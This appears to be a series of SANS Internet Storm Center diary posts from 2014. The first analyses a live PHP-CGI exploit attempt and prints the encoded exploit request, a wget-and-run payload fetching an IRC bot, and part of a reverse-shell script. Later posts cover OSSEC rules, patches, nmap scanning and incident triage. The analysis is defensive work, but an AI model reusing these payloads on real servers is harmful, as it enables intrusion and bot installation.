The offending IP address initiated another connection to the web server approximately 4 hours later. This time, the request was less gentle than the initial probe:

POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25
Content-Type: application/x-www-form-urlencoded

As shown above, the attacking system attempted to access /cgi-bin/php on the targeted server. The parameter supplied to /cgi-bin/php, when converted from hexadecimal into ASCII, corresponded to this:

-dallow_url_include=on-dsafe_mode=off-dsuhosin.simulation=on-ddisable_functions=""-dopen_basedir=none-dauto_prepend_file=php://input-dcgi.force_redirect=0-dcgi.redirect_status_env=0-n

These parameters, when supplied to a vulnerable version of /cgi-bin/php, are designed to dramatically reduce security of the PHP configuration on the system. We covered a similar pattern in our 2012 diary when describing the CVE-2012-1823 vulnerability in PHP. The fix to that vulnerability was poorly implemented, which resulted in the CVE-2012-2311 vulnerability that affected "PHP before 5.3.13 and 5.4.x before 5.4.3, when configured as a CGI script," according to MITRE. The ISS advisory noted that,

"PHP could allow a remote attacker to execute arbitrary code on the system, due to an incomplete fix for an error related to parsing PHP CGI configurations. An attacker could exploit this vulnerability to execute arbitrary code on the system."

SpiderLabs documented a similar exploitation attempt in 2013, where they clarified that "one of the key modifications is to specify 'auto_prepend_file=php://input' which will allow the attacker to send PHP code in the request body."

The Exploit's Primary Payload: Downloading a Bot

With the expectation that the initial part of the malicious POST request reconfigured PHP, the body of the request began with the following code:

php system("wget ip-address-redacted/speedtest/.a/hb/phpR05 -O /tmp/.bash_h1s7;perl /tmp/.bash_h1s7;rm -rf /tmp/.bash_h1s7 &"); ?>

If the exploit was successful, code would direct the targeted server to download /.a/hb/phpR05 from the attacker's server, saving the file as /tmp/.bash_h1s7, then running the file using Perl and then deleting the file. Searching the web for "phpR05" showed a file with this name being used in various exploitation attempts. One such example was very similar to the incident being described in this diary. (In a strange coincidence, that PHP attack was visible in the data that the server was leaking due to a Heartbleed vulnerability!)

The malicious Perl script was an IRC bot, and was recognized as such by several antivirus tools according to VirusTotal. Here's a tiny excerpt from its code:

#####################
# Stealth Shellbot  #
#####################

sub getnick {
  return "Rizee|RYN|05|".int(rand(8999)+1000);
}

This bot was very similar to the one described by James Espinosa in 2013 in an article discussing Perl/ShellBot.B trojan activity, which began with attempts to exploit a phpMyAdmin file inclusion vulnerability.

The Exploit's Secondary Payload: Reverse Shell

In addition to supplying instructions to download the IRC bot, the malicious POST request contained PHP code that implemented a reverse backdoor, directing the targeted web server to establish a connection to the attacker's server on TCP port 22. That script began like this:

$ip = 'ip-address-redacted';
$port = 22;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';

Though the attacker specified port 22, the reverse shell didn't use SSH. Instead, it expected the attacker's server to listen on that port using a simple tool such as Netcat. Experimenting with this script and Netcat in a lab environment confirmed this, as shown in the following screenshot:

In this laboratory experiment, 'nc -l -p 22' directed Netcat to listen for connections on TCP port 22. Once the reverse shell script ran on the system that mimicked the compromised server, the simulated attacker had the ability to run commands on that server (e.g., 'whoami').

Interestingly, the production server's logs showed that the system in the wild was listening on TCP port 22; however, it was actually running SSH there, so the reverse shell connection established by the malicious PHP script would have failed.

A bit of web searching revealed a script called ap-unlock-v1337.py, reportedly written in 2012 by "noptrix," which was designed to exploit the PHP vulnerability outlined above. That script included the exact exploit code used in this incident and included the code that implemented the PHP-based reverse shell. The attacker probably used that script with the goal of installing the Perl-based IRC bot, ignoring the reverse shell feature of the exploit.

Wrap Up

The attack, probably implemented using automated script that probed random IP addresses, was designed to build an IRC-based bot network. It targeted Unix systems that ran a version of PHP susceptible to a 2-year-old vulnerability. This recent incident suggests that there are still plenty of unpatched systems left to compromise. The attacker used an off-the-shelf exploit and an unrelated off-the-shelf bot, both of which were readily available on the Internet. The attacker's infrastructure included 3 different IP addresses, none of which were blocklisted at the time of the incident.

-- Lenny Zeltser

Lenny Zeltser focuses on safeguarding customers' IT operations at NCR Corp. He also teaches how to analyze malware at SANS Institute. Lenny is active on Twitter and . He also writes a security blog, where he recently described other attacks observed on a web server.

1 Comments

Published: 2014-08-15

AppLocker Event Logs with OSSEC 2.8

In a previous post, Monitoring Windows Networks Using Syslog, I discussed using syslog to send the event logs to a SIEM. This post covers another technique for collecting event log data for analysis.

A new version of OSSEC (2.8) has been released that includes the ability on Windows to access event channels that were introduced in Vista. To get this  to work correctly, I had to have the agent and server on 2.8. This new ability allows admins to send some of the more interesting event logs to OSSEC in a very easy way.

Client Config

Setting up the config for the subscription is quite easy.  If you want to do it on an per install basis, you edit the C:\Program Files\ossec-agent\ossec.conf.  Add a new tag for local file, then under location put the XPATH channel name and the log_format as eventchannel.

 

​

 

If you want this config to be pushed out to all your Windows OS centrally, you should add the config below to the /var/ossec/etc/shared/agent.conf. This file has a added XML field for matching which system should apply the config.


 

 

Creating Rules

Once you get the logs, you need to create rules to get the alerts.  When creating the rules, you need to know what event level (e.g. Info, Error ect..) the alerts are created for the event.  To get a detailed list of the events, follow this link (hxxp://technet.microsoft.com/en-us/library/ee844150(v=ws.10).aspx)

 

When creating your own rules, you should always add them to the Local_rules.xml file to make sure they do not get overwritten with updates.  These rules should start with 100000 rule ID.

 

 

 

I’ve posted all my AppLocker rules to my github(hxxps://github.com/tcw3bb/ISC_Posts/blob/master/OSSEC_AppLocker_Local_Rule.xml), and I’ve also submitted them to the OSSEC group to be added in the next version.  When using the local rules, you may need to change rule ID for your environment.  

RAW Log

Once you have the rules in place your alerts like the ones below should be created.

Quick report

To get a report for the current day of who had blocked apps, you can run the following:

>zcat /var/ossec/log/alerts/alerts.log |/var/ossec/bin/ossec-reportd -f rule 100021 -s

 

I also have a nxlog and an eventsys client config on my github (hxxps://github.com/tcw3bb/ISC_Posts)for additional client config.  To use these with OSSEC, you will need to have a different parser and rules.  

--

Tom Webb

1 Comments

Published: 2014-08-14

PHP 5.3.29 is available, PHP 5.3 reaching end of life

The PHP development team announces the immediate availability of PHP 5.3.29. This release marks the end of life of the PHP 5.3 series. Future releases of this series are not planned. All PHP 5.3 users are encouraged to upgrade to the current stable version of PHP 5.5 or previous stable version of PHP 5.4, which are supported till at least 2016 and 2015 respectively.

PHP 5.3.29 contains about 25 potentially security related fixes backported from PHP 5.4 and 5.5.

For source downloads of PHP 5.3.29, please visit our downloads page. Windows binaries can be found on windows.php.net/download/. The list of changes is recorded in the ChangeLog.

For helping your migration to newer versions please refer to our migration guides for updates from PHP 5.3 to 5.4 and from PHP 5.4 to 5.5.

http://php.net/

0 Comments

Published: 2014-08-14

Threats to virtual environments

In the past few years the virtualization concept becomes very popular. A new study by Symantec [1] discussed the threats to the virtual environment and suggests the best practice to minimize the risk.

The study show the new security challenges with the virtual environment, threats such as that the network traffic may not be monitored by services such as IDS or DLP.    

The paper covers how malware behave in virtual environment . One example of malware that target virtual machines is W32.Crisis .This malware doesn’t exploit any specific vulnerability , basically it take the advantage of how the virtual machines are stored in the host system. Virtual machine is stored as a set of files on the storage and it can be manipulated or mounted by free tools.

The study address using VMs as a system for malicious code analysis, for example in some cases when a malicious code detects that’s its running in a virtual machine it will send a false data such as trying to connect to C&C with wrong IP.  The study show that the number of malware that detect Vmware has been increased in the past couple years. For more reliable results the study suggests that security researcher should use physical hardware in controlled network instead of virtual machines.  

In the last section of the paper it suggest the best practice to secure the virtual environment.

1 http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/threats_to_virtual_environments.pdf

0 Comments

Published: 2014-08-13

Updates for Apple Safari

Apple today released updates for Safari 6.x and 7.x . The patches fix 7 vulnerabilities and are available for versions of OS X back to 10.7.5 (Lion). [1]

The bulletin released by Apple is very vague and only talks about "memory corruption issues" but states that some of these vulnerabilities may lead to arbitrary code execution. The vulnerabilities affect WebKit, Apple's browser library, and may affect other products as well.

With this update, the latest versions of Safari are 6.1.6 and 7.0.6.

[1] http://support.apple.com/kb/HT6367

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

0 Comments

Published: 2014-08-12

Adobe updates for 2014/08

Adobe has released security updates for Adobe Flash Player, Adobe AIR, Adobe Reader, and Acrobat. The updates are rated as critical and an impressive number of CVE entries.  CVE-2014-0538, CVE-2014-0540, CVE-2014-0541, CVE-2014-0542, CVE-2014-0543, CVE-2014-0544, CVE-2014-0545, CVE-2014-0546. Summary: update now. 

http://helpx.adobe.com/security/products/flash-player/apsb14-18.html
http://helpx.adobe.com/security/products/reader/apsb14-19.html

Cheers,
Adrien de Beaupré
Intru-shun.ca Inc.
My SANS Teaching Schedule

 

 

0 Comments

Published: 2014-08-12

Something is amiss with the Interwebs! BGP is a flapping.

[Update] See http://www.bgpmon.net/what-caused-todays-internet-hiccup/ for a good summary of what happened.

 

Tuesday Morning, various networks experienced outages from 4-6am EDT (8-10am UTC) [1]. I appears the outage was the result of a somewhat anticipated problem with older routers and their inability to deal with the ever increasing size of the Internet's routing table.

These BGP routers need to store a map of the internet defining which IP address range belongs to which network. Due to the increasing scarcity of IPv4 space, registrars and ISPs assign smaller and smaller netblocks to customers, leading to a more and more fragmented topology. Many older routers are limited to store 512k entries, and the Internet's routing table has become large enough to reach this limit. Tuesday morning, it appears to have exceeded this limit for a short time [2][3].

The large number of route announcements, and immediate removals shown in [2] could indicate a malicious intend behind this events (or a simple configuration error), but either way likely point to one entity "pushing" the size of the routing table beyond the 512k limit briefly. At around this time, one larger ISP (Windstream, AS7029) recovered from an unrelated outage and routing changes due to the recovery are one suspect that may have triggered the event.

Vendors published guidance for users of older routers how to avoid this issue [5]. This guidance has been available for a while. Please contact your vendor if you are affected. You may also want to consider upgrading your router. The routing table is likely going to get larger over the next few years until networks rely less on IPv4 and take advantage of IPv6.

 

[1] https://puck.nether.net/pipermail/outages/2014-August/007090.html
[2] http://www.cymru.com/BGP/prefix_delta.html (see the spike in deltas around that time)
[3] 
http://www.cidr-report.org/2.0/#General_Status  (note how close it is to 512k and rising)
[4] 
http://www.thewhir.com/web-hosting-news/liquidweb-among-companies-affected-major-outage-across-us-network-providers
[5] http://www.cisco.com/c/en/us/support/docs/switches/catalyst-6500-series-switches/117712-problemsolution-cat6500-00.html
 

Cheers,
Adrien de Beaupré
Intru-shun.ca Inc.
My SANS Teaching Schedule

2 Comments

Published: 2014-08-12

Microsoft Patch Tuesday - August 2014

Overview of the August 2014 Microsoft patches and their status.

# Affected Contra Indications - KB Known Exploits Microsoft rating(**) ISC rating(*)
clients servers
MS14-043 Vulnerability in Windows Media Center Could Allow Remote Code Execution
Microsoft Windows

CVE-2014-4060
KB 2978742 No Severity:Critical
Exploitability: 1
Critical Important
MS14-044 Vulnerabilities in SQL Server Could Allow Elevation of Privilege
Microsoft SQL Server

CVE-2014-1820
CVE-2014-4061
KB 2984340 No Severity:Important
Exploitability: 1
Important Important
MS14-045 Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of Privilege
Microsoft Windows

CVE-2014-0318
CVE-2014-1819
CVE-2014-4064
KB 2984615 No Severity:Important
Exploitability: 1
Important Important
MS14-046 Vulnerability in .NET Framework Could Allow Security Feature Bypass
Microsoft Windows,Microsoft .NET Framework

CVE-2014-4062
KB 2984625 No Severity:Important
Exploitability: 1
Important Important
MS14-047 Vulnerability in LRPC Could Allow Security Feature Bypass
Microsoft Windows

CVE-2014-0316
KB 2978668 No Severity:Important
Exploitability: 1
Important Important
MS14-048 Vulnerability in OneNote Could Allow Remote Code Execution
Microsoft Office

CVE-2014-2815
KB 2977201 No Severity:Important
Exploitability: 1
Critical Important
MS14-049 Vulnerability in Windows Installer Service Could Allow Elevation of Privilege
Microsoft Windows

CVE-2014-1814
KB 2962490 No Severity:Important
Exploitability: 1
Important Important
MS14-050 Vulnerability in Microsoft SharePoint Server Could Allow Elevation of Privilege
Microsoft Server Software

CVE-2014-2816
KB 2977202 No Severity:Important
Exploitability: 1
Important Important
MS14-051 Cumulative Security Update for Internet Explorer
Microsoft Windows, Internet Explorer

CVE-2014-2774 CVE-2014-2784 CVE-2014-2796 CVE-2014-2808 CVE-2014-2810 CVE-2014-2811 CVE-2014-2817 CVE-2014-2818 CVE-2014-2819 CVE-2014-2820 CVE-2014-2821 CVE-2014-2822 CVE-2014-2823 CVE-2014-2824 CVE-2014-2825 CVE-2014-2826 CVE-2014-2827 CVE-2014-4050 CVE-2014-4051 CVE-2014-4052 CVE-2014-4055 CVE-2014-4056 CVE-2014-4057 CVE-2014-4058 CVE-2014-4063 CVE-2014-4067 CVE-2014-2774 CVE-2014-2784 CVE-2014-2796 CVE-2014-2808 CVE-2014-2810 CVE-2014-2811 CVE-2014-2817 CVE-2014-2818 CVE-2014-2819 CVE-2014-2820 CVE-2014-2821 CVE-2014-2822 CVE-2014-2823 CVE-2014-2824 CVE-2014-2825 CVE-2014-2826 CVE-2014-2827 CVE-2014-4050 CVE-2014-4051 CVE-2014-4052 CVE-2014-4055 CVE-2014-4056 CVE-2014-4057 CVE-2014-4058 CVE-2014-4063 CVE-2014-4067
KB 2976627 Yes! Severity:Critical
Exploitability: 1
Critical Important
We will update issues on this page for about a week or so as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
    • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threatatches.

--
Alex Stanford - GIAC GWEB & GIAC GSEC
Research Operations Manager,
SANS Internet Storm Center

8 Comments

Published: 2014-08-12

Host discovery with nmap

I enjoy performing penetration tests, I also enjoy teaching how to do penetration testing correctly. Next time up is SANS Sec560 network penetration testing in Albuquerque, NM. When I am teaching one of the points I make is to make good use of your tools. You really want to know which tools is appropriate for which parts of the engagement methodology and test plan. You also want to be familiar with the features and quirks of each tool in your kit. Most people are familiar with nmap as a port scanner, and often some of the other features such as service versioning and operating system fingerprinting. What I would like to talk about today are some of the features of nmap that work well together. One of the tasks in a penetration test or a vulnerability assessment is to identify which hosts are likely alive and responsive. Security testing involves sending stimulus, monitoring, and seeing responses. In this case we typically use nmap to send the stimulus, tcpdump to perform the monitoring, and the responses will tell us which hosts are responding to the packets nmap is sending.

Nmap is most often used to perform a ping sweep with its default series of packets. This option was -sP and is now -sn.

'nmap -sn -iL targets nmap-default-ping'

With root privileges this will send ICMP ech request (ping), a TCP SYN packet to port 443, a TCP ACK packet to port 80, and an ICMP timestamp request. This is efficient and in many cases is sufficient to identify those hosts that are responsive. In the case of a relatively flat internal network this is often the case.  

Tcpdump shows us that 4 packets were sent, 4 responses were also seen.

17:08:37.469613 IP 198.41.30.84 > 74.207.244.221: ICMP echo request, id 44412, seq 0, length 8
17:08:37.469641 IP 198.41.30.84.42601 > 74.207.244.221.443: Flags [S], seq 4035393928, win 1024, options [mss 1460], length 0
17:08:37.469658 IP 198.41.30.84.42601 > 74.207.244.221.80: Flags [.], ack 4035393928, win 1024, length 0
17:08:37.469664 IP 198.41.30.84 > 74.207.244.221: ICMP time stamp query id 30952 seq 0, length 20
17:08:37.541827 IP 74.207.244.221 > 198.41.30.84: ICMP echo reply, id 44412, seq 0, length 8
17:08:37.541841 IP 74.207.244.221.443 > 198.41.30.84.42601: Flags [R.], seq 0, ack 4035393929, win 0, length 0
17:08:37.541868 IP 74.207.244.221.80 > 198.41.30.84.42601: Flags [R], seq 4035393928, win 0, length 0
17:08:37.541968 IP 74.207.244.221 > 198.41.30.84: ICMP time stamp reply id 30952 seq 0: org 00:00:00.000, recv 21:00:18.026, xmit 21:00:18.026, length 20

(74.207.244.221 is scan.nmap.org)

The problem with only sending these 4 packets as the means to do hosts discovery is that it may miss many test cases, and is therefore less accurate. This is an issue in many pentests where we need to balance accuracy against efficient use of our time. Scanning an arbitrary /19 and we see the following results:

Nmap done: 8192 IP addresses (5668 hosts up) scanned in 24.31 seconds
           Raw packets sent: 26981 (968.952KB) | Rcvd: 5954 (176.168KB)

Now consider the following:
 'nmap -sn -PS -PA -PU -PY -PE -PP -PM -PO -n -vv --reason --packet-trace --traceroute -iL targets -oA nmap-full-sweep'
 
Nmap done: 8192 IP addresses (5676 hosts up) scanned in 438.24 seconds
           Raw packets sent: 80075 (2.518MB) | Rcvd: 94752 (4.014MB)

The --reason option tells us which stimulus the hosts responded to. --paket-trace outputs to the screen the packets flying back and forth, giving us a visual indicator to see if the tests are running correctly. The second scan sends 3 different ICMP packets, TCP, UDP, SCTP, and some raw IP packets. The only other tool I often run along with nmap is ike-scan to identify VPN devices that do not respond to any other packets. From the nmap man page:             
-sn: Ping Scan - disable port scan
-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
-PO[protocol list]: IP Protocol Ping

We gained an additional 8 hosts identified as being responsive, however we sent over 3 times the packets and it took much much longer. The second scan is arguably much more accurate, and certainly is a much more impressive command line! Putting together the tools we can construct a nice bash script to run tcpdump and nmap against a target list. The script checks to see if has root privilege, sets up some variables, creats a scan log, runs tcpdump, runs nmap, then stops tcpdump.  

Cheers,
Adrien de Beaupre
Intru-shun.ca Inc.

Check out BSides Ottawa, our CfP is still open! Con is 5-6 September
http://www.bsidesottawa.ca/
I will be teaching SANS Sec560, Network Penetration Testing next in Albuquerque, NM!
http://www.sans.org/event/albuquerque-2014/course/network-penetration-testing-ethical-hacking

References:
http://nmap.org/book/man-host-discovery.html
http://www.nta-monitor.com/tools-resources/security-tools/ike-scan

Begin script:

#!/bin/bash
#Usage: discover.sh targetfilename
# Modified 10 August 2014, Adrien de Beaupre
# Check to see if we have root privileges, exit if not.
if [[ $EUID -ne 0 ]]; then
        echo "$0 must be run as root"
        exit 1
fi
# Check to see if we have a filename as one argument, exit if not.
# Number of arguments we want
GOODARGS=1
if [ $# -ne $GOODARGS ]; then
        echo "Usage: `basename $0` {targetfilename}"
        exit 1
fi
# Check to see if target file exists, exit if not
if [ ! -f $1 ]; then
        echo "Target file \"`basename $1`\" does not exist"
        exit 1
fi
# Declare variables
# Target file
TARGETS=`cat $1`
# Timestamp variable
NOW=$(date +%F-%s)
# Tcpdump program to run variable
TCPDUMP=/usr/local/sbin/tcpdump
# Run the tcpdump program
$TCPDUMP -n -v -i eth0 -w tcpdump-discovery.$NOW.$1.dump 2>/dev/null &
# Variable for the process ID
PID=$!
# Start discovery scan, create or append to scanlog
echo -e 'Discovery scan start:' $HOST | tee -a scanlog
date >> scanlog
# Nmap discovery
nmap -sn -PS -PA -PU -PY -PE -PP -PM -PO -n -vv --reason --packet-trace --traceroute -iL $1 -oA $1-discovery-nmap-$NOW
# Wait two seconds before killing sniffer
sleep 2
# Kill the tcpdump program by PID
echo -e 'Tcpdump stopped:' $HOST | tee -a scanlog
date >> scanlog
kill $PID

2 Comments

Published: 2014-08-11

Verifying preferred SSL/TLS ciphers with Nmap

In last year or two, there has been a lot of talk regarding correct usage of SSL/TLS ciphers on web servers. Due to various incidents more or less known incidents, web sites today should use PFS (Perfect Forward Secrecy), a mechanism that is used when an SSL/TLS connection is established and symmetric keys exchanged. PFS ensures that, in case an attacker obtains the server’s private key, he cannot decrypt previous SSL/TLS connections to that server. If PFS is not used (if RSA is used to exchange symmetric keys), then the attacker can easily decrypt *all* previous SSL/TLS connections. That’s bad.

However, the whole process of choosing a cipher is not all that trivial. By default, the client will present its preferred cipher to use and as long as the server supports that cipher it will be selected. This is, obviously, not optimal in environments where we want to be sure that the most secure cipher will always be selected, so administrators quite often enable their servers so they get to pick the preferred cipher.

This allows an administrator to enable only ciphers he wants to have used, and additionally to define their priorities – the server will always try to pick the cipher with the highest priority (which should be “the most secure one”). Only if the client does not support that cipher, the server will move to the next one and so on, until it finds one that is supported by the client (or, if it doesn’t, the SSL/TLS connection will fail!).

This is good and therefore I started recommending web server administrators to configure their servers so that PFS ciphers are turned on. However, at several occasions I noticed that the administrators incorrectly set the preferred cipher suite order on the server. This can result in non-PFS cipher suites selected, although both the server and the client support PFS.

As mentioned previously, this happens because the client sends the list of the supported ciphers and the server picks "the strongest one" according to its preferred list. 
SSL Labs' (https://www.ssllabs.com/ssltest) shows this when testing with reference browsers, but I wanted to be able to check this myself, from command line, especially when I'm testing servers that are not reachable to SSL Labs (or I don't want them to see the results).

So I modified the Nmap's ssl-enum-ciphers.nse script to list preferred ciphers in addition to just enumerating ciphers. I use this script a lot to list the supported ciphers, but I was missing the preferred ciphers list. Let’s take a look at the following example:

$ nmap -sT -PN -p 443 127.0.0.1 --script ssl-enum-ciphers.nse
Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-11 09:15 UTC
Nmap scan report for 127.0.0.1
Host is up (0.00021s latency).
PORT    STATE SERVICE
443/tcp open  https
| ssl-enum-ciphers:
|   SSLv3: No supported ciphers found
|   TLSv1.0:
|     ciphers:
|       TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA - strong
|       TLS_DHE_RSA_WITH_AES_128_CBC_SHA - strong
|       TLS_DHE_RSA_WITH_AES_256_CBC_SHA - strong
|       TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA - strong
|       TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA - strong
|       TLS_RSA_WITH_3DES_EDE_CBC_SHA - strong
|       TLS_RSA_WITH_AES_128_CBC_SHA - strong
|       TLS_RSA_WITH_AES_256_CBC_SHA - strong
|       TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - strong
|       TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - strong

|     preferred ciphers order:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|       TLS_DHE_RSA_WITH_AES_128_CBC_SHA
|       TLS_DHE_RSA_WITH_AES_256_CBC_SHA
|       TLS_RSA_WITH_AES_256_CBC_SHA
|       TLS_RSA_WITH_3DES_EDE_CBC_SHA
|       TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
|       TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
|       TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|       TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
|       TLS_RSA_WITH_CAMELLIA_128_CBC_SHA

|     compressors:
|       NULL

Now, things get interesting. You can see that the server supports the PFS ciphers (those starting with TLS_DHE are the PFS ciphers) in the original list ( in green). However, take a look at the preferred cipher list (in red). Since the TLS_RSA_WITH_AES_128_CBC_SHA is the preferred cipher by the server, absolutely every browser today (Mozilla, Chrome, IE, Safari) will end up using this cipher – since they all support it. So, even though PFS ciphers are enabled, they will never get used!

Of course, this is an error in the web server’s configuration. Let’s fix it so the PFS ciphers have higher priority and rerun the nmap script:

$ nmap -sT -PN -p 443 127.0.0.1 --script ssl-enum-ciphers.nse
Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-11 09:15 UTC
Nmap scan report for 127.0.0.1
Host is up (0.00021s latency).
PORT    STATE SERVICE
443/tcp open  https
| ssl-enum-ciphers:
|   SSLv3: No supported ciphers found
|   TLSv1.0:
|     ciphers:
|       TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA - strong
|       TLS_DHE_RSA_WITH_AES_128_CBC_SHA - strong
|       TLS_DHE_RSA_WITH_AES_256_CBC_SHA - strong
|       TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA - strong
|       TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA - strong
|       TLS_RSA_WITH_3DES_EDE_CBC_SHA - strong
|       TLS_RSA_WITH_AES_128_CBC_SHA - strong
|       TLS_RSA_WITH_AES_256_CBC_SHA - strong
|       TLS_RSA_WITH_CAMELLIA_128_CBC_SHA - strong
|       TLS_RSA_WITH_CAMELLIA_256_CBC_SHA - strong

|     preferred ciphers order:
|       TLS_DHE_RSA_WITH_AES_128_CBC_SHA
|       TLS_DHE_RSA_WITH_AES_256_CBC_SHA
|       TLS_RSA_WITH_AES_128_CBC_SHA
|       TLS_RSA_WITH_AES_256_CBC_SHA
|       TLS_RSA_WITH_3DES_EDE_CBC_SHA
|       TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
|       TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
|       TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|       TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
|       TLS_RSA_WITH_CAMELLIA_128_CBC_SHA

|     compressors:
|       NULL

Much better! Now the PFS ciphers are preferred and most browser will use them. We can even confirm this with SSL Labs – all relatively new browsers, that support PFS will pick those ciphers.

So, if you want to use this script to test your servers, you can find it at https://github.com/bojanisc/nmap-scripts - please report any bugs to me.

Finally, I also submitted it to Nmap so hopefully it will get added into the official distribution. There is a bug that Daniel Miller noticed – in case a server supports more than 64 ciphers, and the server is running on Microsoft Windows, the script will fail to list the preferred ciphers.

The reason for this is that, when a client connects, Microsoft (the Schannel component I presume) takes into account only the first 64 ciphers listed by the client. The other ciphers are ignored. This is the reason why the original ssl-enum-ciphers.nse Nmap script splits ciphers into chunks of 64. No idea why Microsoft did it this was (since the spec says that the client can include as many as it wants). However, it’s clearly a problem.

Now, I haven’t seen any web servers that support more than 64 ciphers in the wild – let me know if you find one. Additionally, according to this article: http://msdn.microsoft.com/en-us/library/windows/desktop/bb870930%28v=vs.85%29.aspx, the list of cipher suites on Windows is limited to 1023 characters.
Since most cipher names are 20+ characters, this could mean that you can't really have more than ~50 ciphers active on a Windows machine - I haven't tested this though.

 

--
Bojan
bojanz@twitter
INFIGO IS

10 Comments

Published: 2014-08-10

Incident Response with Triage-ir

In many cases having a full disk image is not an option during an incident.  Imagine that you are suspecting that you have dozen of infected or compromised system. Can you spend 2-3 hours to make a forensic copy of hard disks hundred computers? In such situation fast forensics is the solution for such situation. Instead of copying everything collecting some files that may contain an evidence can solve this issue. In this diary I am going to talk about an application that will collect most of these files.

 

 

Triage-IR

Triage-ir is a script written by Michael Ahrendt . Triage-ir will collect system information, network information, registry hives, disk information and it will dump memory. One of the powerful capabilities of triage-ir is collecting information from Volume Shadow Copy (v.851) which can defeat many anti-forensics techniques.

Triage-ir can be obtained from http://code.google.com/p/triage-ir/downloads/list . The triage-ir itself is just a script that depend on other tools such as Sysinternals Suite[i], Dupmpit[ii][iii] , Regripper[iv],md5deep[v] ,7zip[vi] and some windows built-in commands .

Here are the installation steps:

  1. Download Triage-ir
  2. Unzip it
  3. Download the dependencies
  4. Place Sysinternals Suite and Regripper on their own folders under tools foler.
  5. Place the other dependencies under tools folder

In case of incident you would like to keep minimum residues as much as you can therefore I would suggest to copy it to USB drive ,one issue here if you are planning to dump the memory the USB drive should be larger than the physical ram.

Once you launch the application you can select which info you would like to collect. Each category is separate tab.

Let say that you would like to collect the Network Information only. All you have to do is click on Network Information tab and click on Select none then select all information you would like to collect then click run.

Once the collection process finished triage-ir will prompt you that

All the collected information will be dumped in a new folder with date and the system name.


1 Comments

Published: 2014-08-09

Complete application ownage via Multi-POST XSRF

I enjoy performing penetration tests, I also enjoy teaching how to do penetration testing correctly. Next time up is SANS Sec560 network penetration testing in Albuquerque, NM. When I am teaching one of the points I make is to never consider the vulnerabilities in isolation, using them in combination truly demonstrates the risk and impact. I was performing a web application penetration test, and the list of things that it was vulnerable to was quite impressive!:

The list of vulnerabilities:

  • Content can be framed
  • XSS
  • Method interchange
  • DoS, application hangs on long abnormal inputs, relies on client side validation
  • Able to upload files, including malicious content
  • Information leakage, internal server names, IP addresses, install locations...
  • XSRF
  • User enumeration via forgot password function
  • Administrators can disable their own account

We had determined that the primary threat would be for a user to escalate privileges and access information from other accounts. In order to achieve this goal we concentrated on the persistent XSS and XSRF. We would use the persistent XSS to launch the XSRF attack. We leveraged all of the vulnerabilities in one way or another, in other words, we were having a good time!

Using the XSS:

  • Create trouble ticket
  • Ticket will be first viewed by administrator
  • Script executes in the administrator browser
  • Administrator can perform all of the functions vulnerable to XSRF

